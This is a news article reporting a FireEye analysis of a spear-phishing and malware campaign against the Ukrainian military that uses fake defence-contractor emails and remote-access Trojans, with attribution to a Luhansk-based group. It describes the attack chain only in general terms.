This malware campaign is targeting the military with phony emails from a defence contractor

Spear-phishing attacks against Ukraine are part of a cyber-espionage campaign by a group with potent capabilities.
Written by Danny Palmer, Senior Writer

The Ukrainian government and military is being targeted with spear-phishing attacks as part of a cyber-espionage operation based around dropping powerful malware.

These phishing attacks have been detailed by researchers at cybersecurity firm FireEye, who identified malicious emails being sent to Ukrainian military departments in January this year. The malware is being sent, presumably, with the aim of monitoring information about the military and political interests of the Ukrainian government.

Malicious emails sent with the subject line "SPEC-20T-MK2-000-ISS-4.10-09-2018STANDARD" purported to be from a UK defence manufacturer and claimed to be following up from a previous meeting and offered "cooperation development with Ukrainian partners". 

Those sent the emails are invited to download an attachment with the filename "Armtrac-Commercial.7z" which then downloads a zip file, the contents of which are two Word documents and a malicious LNK file – a shortcut used by Windows as a reference to the original file, but with a forged extension to impersonate a PDF file and disguised as a Microsoft Word icon.

This in turn uses a PowerShell script to download a second-stage payload from a command-and-control server to drop malware onto the targeted machine, with the purpose of monitoring and stealing sensitive information on the networks of the Ukrainian military.

A number of different payloads have been observed being deployed, including open-source Trojan malware families such as QuasarRAT and RatVermin. Some of the malware is incredibly potent, providing a backdoor into infected systems, along with access to passwords and other sensitive information.

The Ukrainian government regularly finds itself on the receiving end of a variety of cyberattacks, but the threat actor believed to be behind this campaign focuses almost exclusively on the country.

SEE: A winning strategy for cybersecurity (ZDNet special report) | Download the report as a PDF (TechRepublic)    

Researchers suspect this attack is being conducted by a group based in the Luhansk People's Republic (LPR) which declared independence following political upheaval in 2014. While the group doesn't have the power of a nation-state, this campaign demonstrates how smaller groups can still access sophisticated, evolving malware attacks.

"While cyber espionage is regularly leveraged as a tool of state power, this capability is not limited to states," John Hultquist, director of intelligence analysis at FireEye told ZDNet.

"Just as new state actors are consistently drawn to this practice, many substate actors will inevitably develop capabilities as well, especially those with the resources of a state sponsor or nominal control of territory," he added.

Researchers warn that the attacks are still ongoing and that the attackers continue to develop their operations and evolve in what's described as a "highly interactive" approach to campaigns. A list of indicators of compromise has been posted in FireEye's technical analysis of the campaign.


Editorial standards